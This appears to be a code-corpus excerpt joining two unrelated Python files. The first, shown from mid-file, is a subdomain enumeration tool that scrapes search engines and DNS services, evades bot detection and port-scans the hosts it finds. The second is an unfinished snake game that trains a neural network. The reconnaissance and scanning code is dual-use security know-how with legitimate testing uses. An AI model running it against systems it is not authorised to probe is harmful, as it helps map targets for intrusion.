default=False,
)
parser.add_argument(
"-p", "--ports", help="Scan the found subdomains against specified tcp ports"
)
parser.add_argument(
"-v",
"--verbose",
help="Enable Verbosity and display results in realtime",
nargs="?",
default=False,
)
parser.add_argument(
"-t",
"--threads",
help="Number of threads to use for subbrute bruteforce",
type=int,
default=30,
)
parser.add_argument(
"-e", "--engines", help="Specify a comma-separated list of search engines"
)
parser.add_argument("-o", "--output", help="Save the results to text file")
parser.add_argument(
"-n",
"--no-color",
help="Output without color",
default=False,
action="store_true",
)
return parser.parse_args()
def write_file(filename, subdomains):
# saving subdomains results to output file
print("%s[-] Saving results to file: %s%s%s%s" % (Y, W, R, filename, W))
with open(str(filename), "wt") as f:
for subdomain in subdomains:
f.write(subdomain + os.linesep)
def subdomain_sorting_key(hostname):
"""Sorting key for subdomains
This sorting key orders subdomains from the top-level domain at the right
reading left, then moving '^' and 'www' to the top of their group. For
example, the following list is sorted correctly:
[
'example.com',
'www.example.com',
'a.example.com',
'www.a.example.com',
'b.a.example.com',
'b.example.com',
'example.net',
'www.example.net',
'a.example.net',
]
"""
parts = hostname.split(".")[::-1]
if parts[-1] == "www":
return parts[:-1], 1
return parts, 0
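# A minimal usage sketch (illustrative only, not part of the original script): sorting
# hostnames with this key groups subdomains under their registered domain, e.g.
#     sorted(["a.example.com", "example.com", "www.example.com"], key=subdomain_sorting_key)
#     # -> ["example.com", "www.example.com", "a.example.com"]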
class enumratorBase(object):
def __init__(
self, base_url, engine_name, domain, subdomains=None, silent=False, verbose=True
):
subdomains = subdomains or []
self.domain = urlparse.urlparse(domain).netloc
self.session = requests.Session()
self.subdomains = []
self.timeout = 25
self.base_url = base_url
self.engine_name = engine_name
self.silent = silent
self.verbose = verbose
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.8",
"Accept-Encoding": "gzip",
}
self.print_banner()
def print_(self, text):
if not self.silent:
print(text)
return
def print_banner(self):
"""subclass can override this if they want a fancy banner :)"""
self.print_(G + "[-] Searching now in %s.." % (self.engine_name) + W)
return
def send_req(self, query, page_no=1):
url = self.base_url.format(query=query, page_no=page_no)
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def get_response(self, response):
if response is None:
return 0
return response.text if hasattr(response, "text") else response.content
def check_max_subdomains(self, count):
if self.MAX_DOMAINS == 0:
return False
return count >= self.MAX_DOMAINS
def check_max_pages(self, num):
if self.MAX_PAGES == 0:
return False
return num >= self.MAX_PAGES
# override
def extract_domains(self, resp):
"""chlid class should override this function"""
return
# override
def check_response_errors(self, resp):
"""chlid class should override this function
The function should return True if there are no errors and False otherwise
"""
return True
def should_sleep(self):
"""Some enumrators require sleeping to avoid bot detections like Google enumerator"""
return
def generate_query(self):
"""chlid class should override this function"""
return
def get_page(self, num):
"""chlid class that user different pagnation counter should override this function"""
return num + 10
def enumerate(self, altquery=False):
flag = True
page_no = 0
prev_links = []
retries = 0
while flag:
query = self.generate_query()
count = query.count(
self.domain
) # finding the number of subdomains found so far
# if we have reached the maximum number of subdomains in the search query,
# then we should move on to the next page
if self.check_max_subdomains(count):
page_no = self.get_page(page_no)
if self.check_max_pages(
page_no
): # maximum pages for Google to avoid getting blocked
return self.subdomains
resp = self.send_req(query, page_no)
# check whether any error occurred
if not self.check_response_errors(resp):
return self.subdomains
links = self.extract_domains(resp)
# if the hyperlinks on the previous page are the same as on the current one, we may have reached the last page
if links == prev_links:
retries += 1
page_no = self.get_page(page_no)
# retry a few more times in case it isn't actually the last page
if retries >= 3:
return self.subdomains
prev_links = links
self.should_sleep()
return self.subdomains
class enumratorBaseThreaded(multiprocessing.Process, enumratorBase):
def __init__(
self,
base_url,
engine_name,
domain,
subdomains=None,
q=None,
silent=False,
verbose=True,
):
subdomains = subdomains or []
enumratorBase.__init__(
self,
base_url,
engine_name,
domain,
subdomains,
silent=silent,
verbose=verbose,
)
multiprocessing.Process.__init__(self)
self.q = q
return
def run(self):
domain_list = self.enumerate()
for domain in domain_list:
self.q.append(domain)
class GoogleEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://google.com/search?q={query}&btnG=Search&hl=en-US&biw=&bih=&gbv=1&start={page_no}&filter=0"
self.engine_name = "Google"
self.MAX_DOMAINS = 11
self.MAX_PAGES = 200
super(GoogleEnum, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.q = q
return
def extract_domains(self, resp):
links_list = list() # noqa: C408
link_regx = re.compile("<cite.*?>(.*?)<\/cite>")
try:
links_list = link_regx.findall(resp)
for link in links_list:
link = re.sub("<span.*>", "", link)
if not link.startswith("http"):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if (
subdomain
and subdomain not in self.subdomains
and subdomain != self.domain
):
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def check_response_errors(self, resp):
if (
type(resp) is str or isinstance(resp, unicode) # noqa: F821
) and "Our systems have detected unusual traffic" in resp:
self.print_(
R + "[!] Error: Google probably now is blocking our requests" + W
)
self.print_(R + "[~] Finished now the Google Enumeration ..." + W)
return False
return True
def should_sleep(self):
time.sleep(5)
return
def generate_query(self):
if self.subdomains:
fmt = "site:{domain} -www.{domain} -{found}"
found = " -".join(self.subdomains[: self.MAX_DOMAINS - 2])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain} -www.{domain}".format(domain=self.domain)
return query
class YahooEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://search.yahoo.com/search?p={query}&b={page_no}"
self.engine_name = "Yahoo"
self.MAX_DOMAINS = 10
self.MAX_PAGES = 0
super(YahooEnum, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.q = q
return
def extract_domains(self, resp):
link_regx2 = re.compile(
'<span class=" fz-.*? fw-m fc-12th wr-bw.*?">(.*?)</span>'
)
link_regx = re.compile(
'<span class="txt"><span class=" cite fw-xl fz-15px">(.*?)</span>'
)
links_list = []
try:
links = link_regx.findall(resp)
links2 = link_regx2.findall(resp)
links_list = links + links2
for link in links_list:
link = re.sub("<(\/)?b>", "", link)
if not link.startswith("http"):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if not subdomain.endswith(self.domain):
continue
if (
subdomain
and subdomain not in self.subdomains
and subdomain != self.domain
):
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def should_sleep(self):
return
def get_page(self, num):
return num + 10
def generate_query(self):
if self.subdomains:
fmt = "site:{domain} -domain:www.{domain} -domain:{found}"
found = " -domain:".join(self.subdomains[:77])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain}".format(domain=self.domain)
return query
class AskEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "http://www.ask.com/web?q={query}&page={page_no}&qid=8D6EE6BF52E0C04527E51F64F22C4534&o=0&l=dir&qsrc=998&qo=pagination"
self.engine_name = "Ask"
self.MAX_DOMAINS = 11
self.MAX_PAGES = 0
enumratorBaseThreaded.__init__(
self,
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.q = q
return
def extract_domains(self, resp):
links_list = list() # noqa: C408
link_regx = re.compile('<p class="web-result-url">(.*?)</p>')
try:
links_list = link_regx.findall(resp)
for link in links_list:
if not link.startswith("http"):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def get_page(self, num):
return num + 1
def generate_query(self):
if self.subdomains:
fmt = "site:{domain} -www.{domain} -{found}"
found = " -".join(self.subdomains[: self.MAX_DOMAINS])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain} -www.{domain}".format(domain=self.domain)
return query
class BingEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://www.bing.com/search?q={query}&go=Submit&first={page_no}"
self.engine_name = "Bing"
self.MAX_DOMAINS = 30
self.MAX_PAGES = 0
enumratorBaseThreaded.__init__(
self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent
)
self.q = q
self.verbose = verbose
return
def extract_domains(self, resp):
links_list = list() # noqa: C408
link_regx = re.compile('<li class="b_algo"><h2><a href="(.*?)"')
link_regx2 = re.compile('<div class="b_title"><h2><a href="(.*?)"')
try:
links = link_regx.findall(resp)
links2 = link_regx2.findall(resp)
links_list = links + links2
for link in links_list:
link = re.sub("<(\/)?strong>|<span.*?>|<|>", "", link)
if not link.startswith("http"):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def generate_query(self):
if self.subdomains:
fmt = "domain:{domain} -www.{domain} -{found}"
found = " -".join(self.subdomains[: self.MAX_DOMAINS])
query = fmt.format(domain=self.domain, found=found)
else:
query = "domain:{domain} -www.{domain}".format(domain=self.domain)
return query
class BaiduEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://www.baidu.com/s?pn={page_no}&wd={query}&oq={query}"
self.engine_name = "Baidu"
self.MAX_DOMAINS = 2
self.MAX_PAGES = 760
enumratorBaseThreaded.__init__(
self,
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.querydomain = self.domain
self.q = q
return
def extract_domains(self, resp):
links = list() # noqa: C408
found_newdomain = False
subdomain_list = []
link_regx = re.compile('<a.*?class="c-showurl".*?>(.*?)</a>')
try:
links = link_regx.findall(resp)
for link in links:
link = re.sub("<.*?>|>|<| ", "", link)
if not link.startswith("http"):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain.endswith(self.domain):
subdomain_list.append(subdomain)
if subdomain not in self.subdomains and subdomain != self.domain:
found_newdomain = True
if self.verbose:
self.print_(
"%s%s: %s%s" % (R, self.engine_name, W, subdomain)
)
self.subdomains.append(subdomain.strip())
except Exception:
pass
if not found_newdomain and subdomain_list:
self.querydomain = self.findsubs(subdomain_list)
return links
def findsubs(self, subdomains):
count = Counter(subdomains)
subdomain1 = max(count, key=count.get)
count.pop(subdomain1, "None")
subdomain2 = max(count, key=count.get) if count else ""
return (subdomain1, subdomain2)
def check_response_errors(self, resp):
return True
def should_sleep(self):
time.sleep(random.SystemRandom().randint(2, 5))
return
def generate_query(self):
if self.subdomains and self.querydomain != self.domain:
found = " -site:".join(self.querydomain)
query = "site:{domain} -site:www.{domain} -site:{found} ".format(
domain=self.domain, found=found
)
else:
query = "site:{domain} -site:www.{domain}".format(domain=self.domain)
return query
class NetcraftEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
self.base_url = (
"https://searchdns.netcraft.com/?restriction=site+ends+with&host={domain}"
)
self.engine_name = "Netcraft"
super(NetcraftEnum, self).__init__(
self.base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.q = q
return
def req(self, url, cookies=None):
cookies = cookies or {}
try:
resp = self.session.get(
url, headers=self.headers, timeout=self.timeout, cookies=cookies
)
except Exception as e:
self.print_(e)
resp = None
return resp
def should_sleep(self):
time.sleep(random.SystemRandom().randint(1, 2))
return
def get_next(self, resp):
link_regx = re.compile('<a.*?href="(.*?)">Next Page')
link = link_regx.findall(resp)
url = "http://searchdns.netcraft.com" + link[0]
return url
def create_cookies(self, cookie):
cookies = dict() # noqa: C408
cookies_list = cookie[0 : cookie.find(";")].split("=")
cookies[cookies_list[0]] = cookies_list[1]
# hashlib.sha256 requires a utf-8 encoded str
cookies["netcraft_js_verification_response"] = hashlib.sha256(
urllib.unquote(cookies_list[1]).encode("utf-8")
).hexdigest()
return cookies
def get_cookies(self, headers):
if "set-cookie" in headers:
cookies = self.create_cookies(headers["set-cookie"])
else:
cookies = {}
return cookies
def enumerate(self):
start_url = self.base_url.format(domain="example.com")
resp = self.req(start_url)
cookies = self.get_cookies(resp.headers)
url = self.base_url.format(domain=self.domain)
while True:
resp = self.get_response(self.req(url, cookies))
self.extract_domains(resp)
if "Next Page" not in resp:
return self.subdomains
url = self.get_next(resp)
self.should_sleep()
def extract_domains(self, resp):
links_list = list() # noqa: C408
link_regx = re.compile('<a class="results-table__host" href="(.*?)"')
try:
links_list = link_regx.findall(resp)
for link in links_list:
subdomain = urlparse.urlparse(link).netloc
if not subdomain.endswith(self.domain):
continue
if (
subdomain
and subdomain not in self.subdomains
and subdomain != self.domain
):
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
class DNSdumpster(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://dnsdumpster.com/"
self.live_subdomains = []
self.engine_name = "DNSdumpster"
self.q = q
self.lock = None
super(DNSdumpster, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
return
def check_host(self, host):
is_valid = False
Resolver = dns.resolver.Resolver()
Resolver.nameservers = ["8.8.8.8", "8.8.4.4"]
self.lock.acquire()
try:
ip = Resolver.query(host, "A")[0].to_text()
if ip:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, host))
is_valid = True
self.live_subdomains.append(host)
except:
pass
self.lock.release()
return is_valid
def req(self, req_method, url, params=None):
params = params or {}
headers = dict(self.headers)
headers["Referer"] = "https://dnsdumpster.com"
try:
if req_method == "GET":
resp = self.session.get(url, headers=headers, timeout=self.timeout)
else:
resp = self.session.post(
url, data=params, headers=headers, timeout=self.timeout
)
except Exception as e:
self.print_(e)
resp = None
return self.get_response(resp)
def get_csrftoken(self, resp):
csrf_regex = re.compile(
'<input type="hidden" name="csrfmiddlewaretoken" value="(.*?)">', re.S
)
token = csrf_regex.findall(resp)[0]
return token.strip()
def enumerate(self):
self.lock = threading.BoundedSemaphore(value=70)
resp = self.req("GET", self.base_url)
token = self.get_csrftoken(resp)
params = {"csrfmiddlewaretoken": token, "targetip": self.domain}
post_resp = self.req("POST", self.base_url, params)
self.extract_domains(post_resp)
for subdomain in self.subdomains:
t = threading.Thread(target=self.check_host, args=(subdomain,))
t.start()
t.join()
return self.live_subdomains
def extract_domains(self, resp):
tbl_regex = re.compile(
'<a name="hostanchor"><\/a>Host Records.*?<table.*?>(.*?)</table>', re.S
)
link_regex = re.compile('<td class="col-md-4">(.*?)<br>', re.S)
links = []
try:
results_tbl = tbl_regex.findall(resp)[0]
except IndexError:
results_tbl = ""
links_list = link_regex.findall(results_tbl)
links = list(set(links_list))
for link in links:
subdomain = link.strip()
if not subdomain.endswith(self.domain):
continue
if (
subdomain
and subdomain not in self.subdomains
and subdomain != self.domain
):
self.subdomains.append(subdomain.strip())
return links
class Virustotal(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://www.virustotal.com/ui/domains/{domain}/subdomains"
self.engine_name = "Virustotal"
self.q = q
super(Virustotal, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.url = self.base_url.format(domain=self.domain)
return
# the base send_req needs to be rewritten for this engine
def send_req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception as e:
self.print_(e)
resp = None
return self.get_response(resp)
# once the send_req is rewritten we don't need to call this function, the stock one should be ok
def enumerate(self):
while self.url != "":
resp = self.send_req(self.url)
resp = json.loads(resp)
if "error" in resp:
self.print_(
R
+ "[!] Error: Virustotal probably now is blocking our requests"
+ W
)
break
if "links" in resp and "next" in resp["links"]:
self.url = resp["links"]["next"]
else:
self.url = ""
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
# resp is already parsed as json
try:
for i in resp["data"]:
if i["type"] == "domain":
subdomain = i["id"]
if not subdomain.endswith(self.domain):
continue
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_(
"%s%s: %s%s" % (R, self.engine_name, W, subdomain)
)
self.subdomains.append(subdomain.strip())
except Exception:
pass
class ThreatCrowd(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = (
"https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={domain}"
)
self.engine_name = "ThreatCrowd"
self.q = q
super(ThreatCrowd, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
try:
links = json.loads(resp)["subdomains"]
for link in links:
subdomain = link.strip()
if not subdomain.endswith(self.domain):
continue
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
class CrtSearch(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://crt.sh/?q=%25.{domain}"
self.engine_name = "SSL Certificates"
self.q = q
super(CrtSearch, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
if resp:
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
link_regx = re.compile("<TD>(.*?)</TD>")
try:
links = link_regx.findall(resp)
for link in links:
link = link.strip()
subdomains = []
if "<BR>" in link:
subdomains = link.split("<BR>")
else:
subdomains.append(link)
for subdomain in subdomains:
if not subdomain.endswith(self.domain) or "*" in subdomain:
continue
if "@" in subdomain:
subdomain = subdomain[subdomain.find("@") + 1 :]
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_(
"%s%s: %s%s" % (R, self.engine_name, W, subdomain)
)
self.subdomains.append(subdomain.strip())
except Exception as e:
print(e)
pass
class PassiveDNS(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://api.sublist3r.com/search.php?domain={domain}"
self.engine_name = "PassiveDNS"
self.q = q
super(PassiveDNS, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
if not resp:
return self.subdomains
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
try:
subdomains = json.loads(resp)
for subdomain in subdomains:
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
class portscan:
def __init__(self, subdomains, ports):
self.subdomains = subdomains
self.ports = ports
self.lock = None
def port_scan(self, host, ports):
openports = []
self.lock.acquire()
for port in ports:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
result = s.connect_ex((host, int(port)))
if result == 0:
openports.append(port)
s.close()
except Exception:
pass
self.lock.release()
if len(openports) > 0:
print(
"%s%s%s - %sFound open ports:%s %s%s%s"
% (G, host, W, R, W, Y, ", ".join(openports), W)
)
def run(self):
self.lock = threading.BoundedSemaphore(value=20)
for subdomain in self.subdomains:
t = threading.Thread(target=self.port_scan, args=(subdomain, self.ports))
t.start()
def main(domain, threads, savefile, ports, silent, verbose, enable_bruteforce, engines):
bruteforce_list = set()
search_list = set()
if is_windows:
subdomains_queue = list() # noqa: C408
else:
subdomains_queue = multiprocessing.Manager().list()
# Check Bruteforce Status
if enable_bruteforce or enable_bruteforce is None:
enable_bruteforce = True
# Validate domain
domain_check = re.compile(
"^(http|https)?[a-zA-Z0-9]+([\-\.]{1}[a-zA-Z0-9]+)*\.[a-zA-Z]{2,}$"
)
if not domain_check.match(domain):
if not silent:
print(R + "Error: Please enter a valid domain" + W)
return []
if not domain.startswith("http://") or not domain.startswith("https://"):
domain = "http://" + domain
parsed_domain = urlparse.urlparse(domain)
if not silent:
print(B + "[-] Enumerating subdomains now for %s" % parsed_domain.netloc + W)
if verbose and not silent:
print(
Y
+ "[-] verbosity is enabled, will show the subdomains results in realtime"
+ W
)
supported_engines = {
"baidu": BaiduEnum,
"yahoo": YahooEnum,
"google": GoogleEnum,
"bing": BingEnum,
"ask": AskEnum,
"netcraft": NetcraftEnum,
"dnsdumpster": DNSdumpster,
"virustotal": Virustotal,
"threatcrowd": ThreatCrowd,
"ssl": CrtSearch,
"passivedns": PassiveDNS,
}
chosenEnums = []
if engines is None:
chosenEnums = [
BaiduEnum,
YahooEnum,
GoogleEnum,
BingEnum,
AskEnum,
NetcraftEnum,
DNSdumpster,
Virustotal,
ThreatCrowd,
CrtSearch,
PassiveDNS,
]
else:
engines = engines.split(",")
for engine in engines:
if engine.lower() in supported_engines:
chosenEnums.append(supported_engines[engine.lower()])
# Start the engines enumeration
enums = [
enum(domain, [], q=subdomains_queue, silent=silent, verbose=verbose)
for enum in chosenEnums
]
for enum in enums:
enum.start()
for enum in enums:
enum.join()
subdomains = set(subdomains_queue)
for subdomain in subdomains:
search_list.add(subdomain)
if enable_bruteforce:
if not silent:
print(G + "[-] Starting bruteforce module now using subbrute.." + W)
record_type = False
path_to_file = os.path.dirname(os.path.realpath(__file__))
subs = os.path.join(path_to_file, "subbrute", "names.txt")
resolvers = os.path.join(path_to_file, "subbrute", "resolvers.txt")
process_count = threads
output = False
json_output = False
bruteforce_list = subbrute.print_target(
parsed_domain.netloc,
record_type,
subs,
resolvers,
process_count,
output,
json_output,
search_list,
verbose,
)
subdomains = search_list.union(bruteforce_list)
if subdomains:
subdomains = sorted(subdomains, key=subdomain_sorting_key)
if savefile:
write_file(savefile, subdomains)
if not silent:
print(Y + "[-] Total Unique Subdomains Found: %s" % len(subdomains) + W)
if ports:
if not silent:
print(
G
+ "[-] Start port scan now for the following ports: %s%s"
% (Y, ports)
+ W
)
ports = ports.split(",")
pscan = portscan(subdomains, ports)
pscan.run()
elif not silent:
for subdomain in subdomains:
print(G + subdomain + W)
return subdomains
def interactive():
args = parse_args()
domain = args.domain
threads = args.threads
savefile = args.output
ports = args.ports
enable_bruteforce = args.bruteforce
verbose = args.verbose
engines = args.engines
if verbose or verbose is None:
verbose = True
if args.no_color:
no_color()
banner()
res = main( # noqa: F841
domain,
threads,
savefile,
ports,
silent=False,
verbose=verbose,
enable_bruteforce=enable_bruteforce,
engines=engines,
)
if __name__ == "__main__":
interactive()
|
GameLoop.py | import pygame
import threading
import time
from utility.globalStuff import Direction, Tile
from Snake import SnakeObject
from Food import FoodGenerator
from NNObjects.NNEvol import EvNeuralTrainer, EvNeuralNet
import utility.constants as CONSTANTS
class Game(object):
def __init__(self, tilesX, tilesY, ScreenWidth, ScreenHeight, Title):
load = input("Load saved (y/n) : ")
loadID = -1
loadNumber = 25
highestScore = 1
if(CONSTANTS.checkIfYes(load)):
for save_name in CONSTANTS.getAllSaves():
print(save_name)
sin = input("Specify target Save-id(sid) : ")
if(sin.isdigit()):
print("Specifications for Loading... ( press Enter for default value )")
loadID = int(sin)
sin = input("Specify maximum generation's to load ( all / default ) : ")
if(sin == 'all'):
loadNumber = 200
sin = input("Specify starting highscore( used to determine max steps ) :")
highestScore = CONSTANTS.StringToInt(sin, -1, 1, 99)
print('')
print('Loading NN specification from file...')
else:
print('Invalid input - SaveID is supposed to be an integer!')
self.fieldOfView = 5
self.populationSize = 150
self.hidden_nodes1 = 10
self.hidden_nodes2 = 10
self.memoryNodes = 10
if(loadID == -1):
print("")
print('Skipping loading, Initializing as DEFAULT!')
print('Enter blank to leave as default!')
print("")
sin = input("Do you wish to Initialize NN as default (y/n) : ")
print(len(sin))
print(sin == '')
if(not CONSTANTS.checkIfYes(sin) and not sin == ''):
print("Specifications for NN...")
sin = input('Choose agent fieldOfView ( default - 5, min - 3, max - 40 ) : ')
self.fieldOfView = CONSTANTS.StringToInt(sin, self.fieldOfView, 3, 40)
print('Specify number of nodes in each layer ( default for each layer is 10 )...')
sin = input('Hidden layer n1 nodes : ')
self.hidden_nodes1 = CONSTANTS.StringToInt(sin, self.hidden_nodes1, 3, 9999)
sin = input('Hidden layer n2 nodes : ')
self.hidden_nodes2 = CONSTANTS.StringToInt(sin, self.hidden_nodes2, 3, 9999)
sin = input('Memory nodes : ')
self.memoryNodes = CONSTANTS.StringToInt(sin, self.memoryNodes, 3, 9999)
print('initializing NN with given values...')
else:
print('initializing NN with default values...')
print('')
print('The next steps initialize the environment...')
print('Note the default snake starting size is about 20, instead of 3.')
print('This avoids training the snake while it is small, which makes training much easier.')
print('It is possible that an even bigger starting size would yield better overall results.')
print('')
sin = input('Enter population size (default 150) : ')
self.populationSize = CONSTANTS.StringToInt(sin, self.populationSize, 10, 10000)
sid = input('Choose snake starting size ( default - 21, min - 3 ) : ')
self.snakeStartingSize = CONSTANTS.StringToInt(sid, 21, 3, 200)
print('Settings confirmed starting...')
self.tileX = (int)(ScreenWidth / tilesX)
self.tileY = (int)(ScreenHeight / tilesY)
self.sizeX = tilesX
self.sizeY = tilesY
self.centerX = tilesX * .5
self.centerY = tilesY * .5
self.moveScale = 1
self.snakeList = []
self.updateDirection = False
self.direction = Direction.up
self._tiles = []
self.tileByPos = {}
self.foodCount = 1
self.foodG = FoodGenerator(self, self.foodCount)
self.AiC = 1
self.delay = 1
self.maxspeed = False
self.resetSpeed = False
self.maxSteps = 75
#initialize pygame and create window
pygame.init()
self.run = True
self.win = pygame.display.set_mode((ScreenWidth, ScreenHeight))
#initialize our neural trainer and create/load the first population
self.EvN = EvNeuralTrainer(self, self.populationSize, (self.fieldOfView ** 2) + 3,
self.hidden_nodes1, self.hidden_nodes2, self.memoryNodes,
4, loadID = loadID, stepsLevel = highestScore, loadNumber = loadNumber)
#self.snakeList.append(SnakeObject(self.centerX, self.centerY, self))
#set brains for the starting snakes. Note: self.AiC is used to train multiple networks at once.
#note: running multiple agents at once might result in poor performance, because each snake
#might "steal" the food of the others, so they would have to "race" each other, which might not be what we want.
#it might be fairly simple to add separate "foods" for each snake by giving each food a unique per-snake id;
#we would then need to hide the non-interactable food from each snake.
for i in range(self.AiC):
snake = SnakeObject(self.centerX, self.centerY, self)
snake.setNN(self.EvN._population[i])
self.snakeList.append(snake)
#create borders
for x in range(tilesX):
self.addTile(Tile(x, 0, -1))
self.addTile(Tile(x, tilesY - 1, -1))
for y in range(tilesY):
self.addTile(Tile(0, y, -1))
self.addTile(Tile(tilesX - 1, y, -1))
pygame.display.set_caption(Title)
threading.Thread(target=self.main_loop).start()
def reset(self):
if(len(self.snakeList) <= 0):
self.foodG.reset()
self.EvN.newGeneration()
for i in range(self.AiC):
snake = SnakeObject(self.centerX, self.centerY, self)
snake.setNN(self.EvN._population[i])
self.snakeList.append(snake)
def input_handle(self):
#user interactible "thread" or "main thread" handles user inputs.
#solver freezes in the run time.
while self.run:
pygame.time.delay(10)
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.run = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_w:
self.updateDirection = True
self.direction = Direction.down
elif event.key == pygame.K_s:
self.updateDirection = True
self.direction = Direction.up
elif event.key == pygame.K_d:
self.updateDirection = True
self.direction = Direction.right
elif event.key == pygame.K_a:
self.updateDirection = True
self.direction = Direction.left
elif event.key == pygame.K_UP:
self.delay = int(self.delay * .5)
if(self.delay < 1):
self.delay = 1
self.maxspeed = True
elif event.key == pygame.K_DOWN:
if(self.maxspeed):
self.delay = 1
self.maxspeed = False
else:
self.delay *= 2
elif event.key == pygame.K_i:
self.AiC += 1
elif event.key == pygame.K_k:
self.AiC -= 1
if(self.AiC < 1):
self.AiC = 1
elif event.key == pygame.K_u:
self.foodCount += 1
self.foodG.setFoodCount(self.foodCount)
elif event.key == pygame.K_j:
self.foodCount -= 1
if(self.foodCount < 1):
self.foodCount = 1
self.foodG.setFoodCount(self.foodCount)
def main_loop(self):
while self.run:
if(not self.maxspeed):
pygame.time.delay(self.delay)
self.win.fill((0, 0, 0))
#self.showInputView()
self.update()
pygame.display.update()
pygame.quit()
def showInputView(self):
if self.updateDirection:
self.updateDirection = False
for snake in self.snakeList:
snake.updateDirection(self.direction)
for snake in self.snakeList:
snake.updateBody(self._tiles)
map = snake.getNNInputs(self._tiles)
